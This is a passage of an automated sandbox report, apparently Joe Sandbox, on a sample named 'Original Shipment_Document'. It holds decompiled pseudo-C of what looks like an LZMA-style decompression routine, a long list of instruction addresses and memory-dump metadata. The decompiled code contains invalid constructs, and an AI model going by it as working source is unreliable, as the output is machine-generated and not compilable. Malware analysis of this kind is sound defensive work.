											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                                                0x00000000
                                                0x00406f07
                                                0x00406f07
                                                0x00406f0b
                                                0x00406f34
                                                0x00406f3e
                                                0x00406f0d
                                                0x00406f16
                                                0x00406f23
                                                0x00406f26
                                                0x0040726a
                                                0x0040726a
                                                0x0040726d
                                                0x0040726d
                                                0x0040726d
                                                0x00407273
                                                0x00407279
                                                0x0040727f
                                                0x00407299
                                                0x0040729c
                                                0x004072a2
                                                0x004072ad
                                                0x004072af
                                                0x00407281
                                                0x00407281
                                                0x00407290
                                                0x00407294
                                                0x00407294
                                                0x004072b9
                                                0x00000000
                                                0x00000000
                                                0x004072bb
                                                0x004072bf
                                                0x0040746e
                                                0x00407484
                                                0x0040748c
                                                0x00407493
                                                0x00407495
                                                0x0040749c
                                                0x004074a0
                                                0x004074a0
                                                0x004072cb
                                                0x004072d2
                                                0x004072da
                                                0x004072dd
                                                0x004072e0
                                                0x004072e0
                                                0x004072e6
                                                0x004072e6
                                                0x00406a82
                                                0x00406a82
                                                0x00406a82
                                                0x00406a8b
                                                0x00000000
                                                0x00000000
                                                0x00406a91
                                                0x00000000
                                                0x00406a9c
                                                0x00000000
                                                0x00000000
                                                0x00406aa5
                                                0x00406aa8
                                                0x00406aab
                                                0x00406aaf
                                                0x00000000
                                                0x00000000
                                                0x00406ab5
                                                0x00406ab8
                                                0x00406aba
                                                0x00406abb
                                                0x00406abe
                                                0x00406ac0
                                                0x00406ac1
                                                0x00406ac3
                                                0x00406ac6
                                                0x00406acb
                                                0x00406ad0
                                                0x00406ad9
                                                0x00406aec
                                                0x00406aef
                                                0x00406afb
                                                0x00406b23
                                                0x00406b25
                                                0x00406b33
                                                0x00406b33
                                                0x00406b37
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406b27
                                                0x00406b27
                                                0x00406b2a
                                                0x00406b2b
                                                0x00406b2b
                                                0x00000000
                                                0x00406b27
                                                0x00406b01
                                                0x00406b06
                                                0x00406b06
                                                0x00406b0f
                                                0x00406b17
                                                0x00406b1a
                                                0x00000000
                                                0x00406b20
                                                0x00406b20
                                                0x00000000
                                                0x00406b20
                                                0x00000000
                                                0x00406b3d
                                                0x00406b3d
                                                0x00406b41
                                                0x004073ed
                                                0x00000000
                                                0x004073ed
                                                0x00406b4a
                                                0x00406b5a
                                                0x00406b5d
                                                0x00406b60
                                                0x00406b60
                                                0x00406b60
                                                0x00406b63
                                                0x00406b67
                                                0x00000000
                                                0x00000000
                                                0x00406b69
                                                0x00406b6f
                                                0x00406b99
                                                0x00406b9f
                                                0x00406ba6
                                                0x00000000
                                                0x00406ba6
                                                0x00406b75
                                                0x00406b78
                                                0x00406b7d
                                                0x00406b7d
                                                0x00406b88
                                                0x00406b90
                                                0x00406b93
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406bd8
                                                0x00406bde
                                                0x00406be1
                                                0x00406bee
                                                0x00406bf6
                                                0x0040726a
                                                0x00000000
                                                0x00000000
                                                0x00406bad
                                                0x00406bad
                                                0x00406bb1
                                                0x004073fc
                                                0x00000000
                                                0x004073fc
                                                0x00406bbd
                                                0x00406bc8
                                                0x00406bc8
                                                0x00406bc8
                                                0x00406bcb
                                                0x00406bce
                                                0x00406bd1
                                                0x00406bd6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040726d
                                                0x0040726d
                                                0x00407273
                                                0x00407279
                                                0x0040727f
                                                0x00407299
                                                0x0040729c
                                                0x004072a2
                                                0x004072ad
                                                0x004072af
                                                0x00407281
                                                0x00407281
                                                0x00407290
                                                0x00407294
                                                0x00407294
                                                0x004072b9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406bfe
                                                0x00406c00
                                                0x00406c03
                                                0x00406c74
                                                0x00406c77
                                                0x00406c7a
                                                0x00406c81
                                                0x00406c8b
                                                0x0040726a
                                                0x0040726a
                                                0x00000000
                                                0x0040726a
                                                0x0040726a
                                                0x00406c05
                                                0x00406c09
                                                0x00406c0c
                                                0x00406c0e
                                                0x00406c11
                                                0x00406c14
                                                0x00406c16
                                                0x00406c19
                                                0x00406c1b
                                                0x00406c20
                                                0x00406c23
                                                0x00406c26
                                                0x00406c2a
                                                0x00406c31
                                                0x00406c34
                                                0x00406c3b
                                                0x00406c3f
                                                0x00406c47
                                                0x00406c47
                                                0x00406c47
                                                0x00406c41
                                                0x00406c41
                                                0x00406c41
                                                0x00406c36
                                                0x00406c36
                                                0x00406c36
                                                0x00406c4b
                                                0x00406c4e
                                                0x00406c6c
                                                0x00406c6e
                                                0x00000000
                                                0x00406c50
                                                0x00406c50
                                                0x00406c53
                                                0x00406c56
                                                0x00406c59
                                                0x00406c5b
                                                0x00406c5b
                                                0x00406c5b
                                                0x00406c5e
                                                0x00406c61
                                                0x00406c63
                                                0x00406c64
                                                0x00406c67
                                                0x00000000
                                                0x00406c67
                                                0x00000000
                                                0x00406e9d
                                                0x00406ea1
                                                0x00406ebf
                                                0x00406ec2
                                                0x00406ec9
                                                0x00406ecc
                                                0x00406ecf
                                                0x00406ed2
                                                0x00406ed5
                                                0x00406ed8
                                                0x00406eda
                                                0x00406ee1
                                                0x00406ee2
                                                0x00406ee4
                                                0x00406ee7
                                                0x00406eea
                                                0x00406eed
                                                0x00406eed
                                                0x00406ef2
                                                0x00000000
                                                0x00406ef2
                                                0x00406ea3
                                                0x00406ea6
                                                0x00406ea9
                                                0x00406eb3
                                                0x0040726a
                                                0x0040726a
                                                0x00000000
                                                0x0040726a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406f4a
                                                0x00406f4e
                                                0x00000000
                                                0x00000000
                                                0x00406f54
                                                0x00406f58
                                                0x00000000
                                                0x00000000
                                                0x00406f5e
                                                0x00406f60
                                                0x00406f64
                                                0x00406f64
                                                0x00406f67
                                                0x00406f6b
                                                0x00000000
                                                0x00000000
                                                0x00406fbb
                                                0x00406fbf
                                                0x00406fc6
                                                0x00406fc9
                                                0x00406fcc
                                                0x00406fd6
                                                0x0040726a
                                                0x0040726a
                                                0x00000000
                                                0x0040726a
                                                0x0040726a
                                                0x00406fc1
                                                0x00000000
                                                0x00000000
                                                0x00406fe2
                                                0x00406fe6
                                                0x00406fed
                                                0x00406ff0
                                                0x00406ff3
                                                0x00406fe8
                                                0x00406fe8
                                                0x00406fe8
                                                0x00406ff6
                                                0x00406ff9
                                                0x00406ffc
                                                0x00406ffc
                                                0x00406fff
                                                0x00407002
                                                0x00407005
                                                0x00407005
                                                0x00407008
                                                0x0040700f
                                                0x00407014
                                                0x00000000
                                                0x00000000
                                                0x004070a2
                                                0x004070a2
                                                0x004070a6
                                                0x00407444
                                                0x00000000
                                                0x00407444
                                                0x004070ac
                                                0x004070af
                                                0x004070b2
                                                0x004070b6
                                                0x004070b9
                                                0x004070bf
                                                0x004070c1
                                                0x004070c1
                                                0x004070c1
                                                0x004070c4
                                                0x004070c7
                                                0x00000000
                                                0x00000000
                                                0x00406c97
                                                0x00406c97
                                                0x00406c9b
                                                0x00407408
                                                0x00000000
                                                0x00407408
                                                0x00406ca1
                                                0x00406ca4
                                                0x00406ca7
                                                0x00406cab
                                                0x00406cae
                                                0x00406cb4
                                                0x00406cb6
                                                0x00406cb6
                                                0x00406cb6
                                                0x00406cb9
                                                0x00406cbc
                                                0x00406cbc
                                                0x00406cbf
                                                0x00406cc2
                                                0x00000000
                                                0x00000000
                                                0x00406cc8
                                                0x00406cce
                                                0x00000000
                                                0x00000000
                                                0x00406cd4
                                                0x00406cd4
                                                0x00406cd8
                                                0x00406cdb
                                                0x00406cde
                                                0x00406ce1
                                                0x00406ce4
                                                0x00406ce5
                                                0x00406ce8
                                                0x00406cea
                                                0x00406cf0
                                                0x00406cf3
                                                0x00406cf6
                                                0x00406cf9
                                                0x00406cfc
                                                0x00406cff
                                                0x00406d02
                                                0x00406d1e
                                                0x00406d21
                                                0x00406d24
                                                0x00406d27
                                                0x00406d2e
                                                0x00406d32
                                                0x00406d34
                                                0x00406d38
                                                0x00406d04
                                                0x00406d04
                                                0x00406d08
                                                0x00406d10
                                                0x00406d15
                                                0x00406d17
                                                0x00406d19
                                                0x00406d19
                                                0x00406d3b
                                                0x00406d42
                                                0x00406d45
                                                0x00000000
                                                0x00406d4b
                                                0x00000000
                                                0x00406d4b
                                                0x00000000
                                                0x00406d50
                                                0x00406d50
                                                0x00406d54
                                                0x00407414
                                                0x00000000
                                                0x00407414
                                                0x00406d5a
                                                0x00406d5d
                                                0x00406d60
                                                0x00406d64
                                                0x00406d67
                                                0x00406d6d
                                                0x00406d6f
                                                0x00406d6f
                                                0x00406d6f
                                                0x00406d72
                                                0x00406d75
                                                0x00406d75
                                                0x00406d75
                                                0x00406d7b
                                                0x00000000
                                                0x00000000
                                                0x00406d7d
                                                0x00406d80
                                                0x00406d83
                                                0x00406d86
                                                0x00406d89
                                                0x00406d8c
                                                0x00406d8f
                                                0x00406d92
                                                0x00406d95
                                                0x00406d98
                                                0x00406d9b
                                                0x00406db3
                                                0x00406db6
                                                0x00406db9
                                                0x00406dbc
                                                0x00406dbc
                                                0x00406dbf
                                                0x00406dc3
                                                0x00406dc5
                                                0x00406d9d
                                                0x00406d9d
                                                0x00406da5
                                                0x00406daa
                                                0x00406dac
                                                0x00406dae
                                                0x00406dae
                                                0x00406dc8
                                                0x00406dcf
                                                0x00406dd2
                                                0x00000000
                                                0x00406dd4
                                                0x00000000
                                                0x00406dd4
                                                0x00406dd2
                                                0x00406dd9
                                                0x00406dd9
                                                0x00406dd9
                                                0x00406dd9
                                                0x00000000
                                                0x00000000
                                                0x00406e14
                                                0x00406e14
                                                0x00406e18
                                                0x00407420
                                                0x00000000
                                                0x00407420
                                                0x00406e1e
                                                0x00406e21
                                                0x00406e24
                                                0x00406e28
                                                0x00406e2b
                                                0x00406e31
                                                0x00406e33
                                                0x00406e33
                                                0x00406e33
                                                0x00406e36
                                                0x00406e39
                                                0x00406e39
                                                0x00406e3f
                                                0x00406ddd
                                                0x00406ddd
                                                0x00406de0
                                                0x00000000
                                                0x00406de0
                                                0x00406e41
                                                0x00406e41
                                                0x00406e44
                                                0x00406e47
                                                0x00406e4a
                                                0x00406e4d
                                                0x00406e50
                                                0x00406e53
                                                0x00406e56
                                                0x00406e59
                                                0x00406e5c
                                                0x00406e5f
                                                0x00406e77
                                                0x00406e7a
                                                0x00406e7d
                                                0x00406e80
                                                0x00406e80
                                                0x00406e83
                                                0x00406e87
                                                0x00406e89
                                                0x00406e61
                                                0x00406e61
                                                0x00406e69
                                                0x00406e6e
                                                0x00406e70
                                                0x00406e72
                                                0x00406e72
                                                0x00406e8c
                                                0x00406e93
                                                0x00406e96
                                                0x00000000
                                                0x00406e98
                                                0x00000000
                                                0x00406e98
                                                0x00000000
                                                0x00407125
                                                0x00407125
                                                0x00407129
                                                0x00407450
                                                0x00000000
                                                0x00407450
                                                0x0040712f
                                                0x00407132
                                                0x00407135
                                                0x00407139
                                                0x0040713c
                                                0x00407142
                                                0x00407144
                                                0x00407144
                                                0x00407144
                                                0x00407147
                                                0x00000000
                                                0x00000000
                                                0x00406ef5
                                                0x00406ef5
                                                0x00406ef8
                                                0x0040726a
                                                0x0040726a
                                                0x00000000
                                                0x0040726a
                                                0x00000000
                                                0x00407234
                                                0x00407238
                                                0x0040725a
                                                0x0040725d
                                                0x00407267
                                                0x0040726a
                                                0x0040726a
                                                0x00000000
                                                0x0040726a
                                                0x0040726a
                                                0x0040723a
                                                0x0040723d
                                                0x00407241
                                                0x00407244
                                                0x00407244
                                                0x00407247
                                                0x00000000
                                                0x00000000
                                                0x004072f1
                                                0x004072f5
                                                0x00407313
                                                0x00407313
                                                0x00407313
                                                0x0040731a
                                                0x00407321
                                                0x00407328
                                                0x00407328
                                                0x00000000
                                                0x00407328
                                                0x004072f7
                                                0x004072fa
                                                0x004072fd
                                                0x00407300
                                                0x00407307
                                                0x0040724b
                                                0x0040724b
                                                0x0040724e
                                                0x00000000
                                                0x00000000
                                                0x004073e2
                                                0x004073e5
                                                0x004072e6
                                                0x00000000
                                                0x00000000
                                                0x0040701c
                                                0x0040701e
                                                0x00407025
                                                0x00407026
                                                0x00407028
                                                0x0040702b
                                                0x00000000
                                                0x00000000
                                                0x00407033
                                                0x00407036
                                                0x00407039
                                                0x0040703b
                                                0x0040703d
                                                0x0040703d
                                                0x0040703e
                                                0x00407041
                                                0x00407048
                                                0x0040704b
                                                0x00407059
                                                0x00000000
                                                0x00000000
                                                0x0040732f
                                                0x0040732f
                                                0x00407332
                                                0x00407339
                                                0x00000000
                                                0x00000000
                                                0x0040733e
                                                0x0040733e
                                                0x00407342
                                                0x0040747a
                                                0x00000000
                                                0x0040747a
                                                0x00407348
                                                0x0040734b
                                                0x0040734e
                                                0x00407352
                                                0x00407355
                                                0x0040735b
                                                0x0040735d
                                                0x0040735d
                                                0x0040735d
                                                0x00407360
                                                0x00407363
                                                0x00407363
                                                0x00407363
                                                0x00407363
                                                0x00407366
                                                0x00407366
                                                0x0040736a
                                                0x004073ca
                                                0x004073cd
                                                0x004073d2
                                                0x004073d3
                                                0x004073d5
                                                0x004073d7
                                                0x004073da
                                                0x004072e6
                                                0x004072e6
                                                0x00000000
                                                0x004072ec
                                                0x004072e6
                                                0x0040736c
                                                0x00407372
                                                0x00407375
                                                0x00407378
                                                0x0040737b
                                                0x0040737e
                                                0x00407381
                                                0x00407384
                                                0x00407387
                                                0x0040738a
                                                0x0040738d
                                                0x004073a6
                                                0x004073a9
                                                0x004073ac
                                                0x004073af
                                                0x004073b3
                                                0x004073b5
                                                0x004073b5
                                                0x004073b6
                                                0x004073b9
                                                0x0040738f
                                                0x0040738f
                                                0x00407397
                                                0x0040739c
                                                0x0040739e
                                                0x004073a1
                                                0x004073a1
                                                0x004073bc
                                                0x004073c3
                                                0x00000000
                                                0x004073c5
                                                0x00000000
                                                0x004073c5
                                                0x00000000
                                                0x00407061
                                                0x00407064
                                                0x0040709a
                                                0x004071ca
                                                0x004071ca
                                                0x004071ca
                                                0x004071ca
                                                0x004071cd
                                                0x004071cd
                                                0x004071d0
                                                0x004071d2
                                                0x0040745c
                                                0x00000000
                                                0x0040745c
                                                0x004071d8
                                                0x004071db
                                                0x00000000
                                                0x00000000
                                                0x004071e1
                                                0x004071e5
                                                0x004071e8
                                                0x004071e8
                                                0x004071e8
                                                0x00000000
                                                0x004071e8
                                                0x00407066
                                                0x00407068
                                                0x0040706a
                                                0x0040706c
                                                0x0040706f
                                                0x00407070
                                                0x00407072
                                                0x00407074
                                                0x00407077
                                                0x0040707a
                                                0x00407090
                                                0x00407095
                                                0x004070cd
                                                0x004070cd
                                                0x004070d1
                                                0x004070fd
                                                0x004070ff
                                                0x00407106
                                                0x00407109
                                                0x0040710c
                                                0x0040710c
                                                0x00407111
                                                0x00407111
                                                0x00407113
                                                0x00407116
                                                0x0040711d
                                                0x00407120
                                                0x0040714d
                                                0x0040714d
                                                0x00407150
                                                0x00407153
                                                0x004071c7
                                                0x004071c7
                                                0x004071c7
                                                0x00000000
                                                0x004071c7
                                                0x00407155
                                                0x0040715b
                                                0x0040715e
                                                0x00407161
                                                0x00407164
                                                0x00407167
                                                0x0040716a
                                                0x0040716d
                                                0x00407170
                                                0x00407173
                                                0x00407176
                                                0x0040718f
                                                0x00407191
                                                0x00407194
                                                0x00407195
                                                0x00407198
                                                0x0040719a
                                                0x0040719d
                                                0x0040719f
                                                0x004071a1
                                                0x004071a4
                                                0x004071a6
                                                0x004071a9
                                                0x004071ad
                                                0x004071af
                                                0x004071af
                                                0x004071b0
                                                0x004071b3
                                                0x004071b6
                                                0x00407178
                                                0x00407178
                                                0x00407180
                                                0x00407185
                                                0x00407187
                                                0x0040718a
                                                0x0040718a
                                                0x004071b9
                                                0x004071c0
                                                0x0040714a
                                                0x0040714a
                                                0x0040714a
                                                0x0040714a
                                                0x00000000
                                                0x004071c2
                                                0x00000000
                                                0x004071c2
                                                0x004071c0
                                                0x004070d3
                                                0x004070d6
                                                0x004070d8
                                                0x004070db
                                                0x004070de
                                                0x004070e1
                                                0x004070e3
                                                0x004070e6
                                                0x004070e9
                                                0x004070e9
                                                0x004070ec
                                                0x004070ec
                                                0x004070ef
                                                0x004070f6
                                                0x004070ca
                                                0x004070ca
                                                0x004070ca
                                                0x004070ca
                                                0x00000000
                                                0x004070f8
                                                0x00000000
                                                0x004070f8
                                                0x004070f6
                                                0x0040707c
                                                0x0040707f
                                                0x00407081
                                                0x00407084
                                                0x00000000
                                                0x00000000
                                                0x00406de3
                                                0x00406de3
                                                0x00406de7
                                                0x0040742c
                                                0x00000000
                                                0x0040742c
                                                0x00406ded
                                                0x00406df0
                                                0x00406df3
                                                0x00406df6
                                                0x00406df9
                                                0x00406dfc
                                                0x00406dff
                                                0x00406e01
                                                0x00406e04
                                                0x00406e07
                                                0x00406e0a
                                                0x00406e0c
                                                0x00406e0c
                                                0x00406e0c
                                                0x00000000
                                                0x00000000
                                                0x00406f6e
                                                0x00406f6e
                                                0x00406f72
                                                0x00407438
                                                0x00000000
                                                0x00407438
                                                0x00406f78
                                                0x00406f7b
                                                0x00406f7e
                                                0x00406f81
                                                0x00406f83
                                                0x00406f83
                                                0x00406f83
                                                0x00406f86
                                                0x00406f89
                                                0x00406f8c
                                                0x00406f8f
                                                0x00406f92
                                                0x00406f95
                                                0x00406f96
                                                0x00406f98
                                                0x00406f98
                                                0x00406f98
                                                0x00406f9b
                                                0x00406f9e
                                                0x00406fa1
                                                0x00406fa4
                                                0x00406fa4
                                                0x00406fa4
                                                0x00406fa7
                                                0x00406fa9
                                                0x00406fa9
                                                0x00000000
                                                0x00000000
                                                0x004071eb
                                                0x004071eb
                                                0x004071eb
                                                0x004071ef
                                                0x00000000
                                                0x00000000
                                                0x004071f5
                                                0x004071f8
                                                0x004071fb
                                                0x004071fe
                                                0x00407200
                                                0x00407200
                                                0x00407200
                                                0x00407203
                                                0x00407206
                                                0x00407209
                                                0x0040720c
                                                0x0040720f
                                                0x00407212
                                                0x00407213
                                                0x00407215
                                                0x00407215
                                                0x00407215
                                                0x00407218
                                                0x0040721b
                                                0x0040721e
                                                0x00407221
                                                0x00407224
                                                0x00407228
                                                0x0040722a
                                                0x0040722d
                                                0x00000000
                                                0x0040722f
                                                0x00406fac
                                                0x00406fac
                                                0x00000000
                                                0x00406fac
                                                0x0040722d
                                                0x00407462
                                                0x00000000
                                                0x00000000
                                                0x00406a91
                                                0x00407499
                                                0x00407499
                                                0x00000000
                                                0x00407499
                                                0x004072e6
                                                0x0040726d
                                                0x0040726a

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 387721db96078c788ef05d401c52d1705cfc64557ecb0b14db2e4703a56ba408
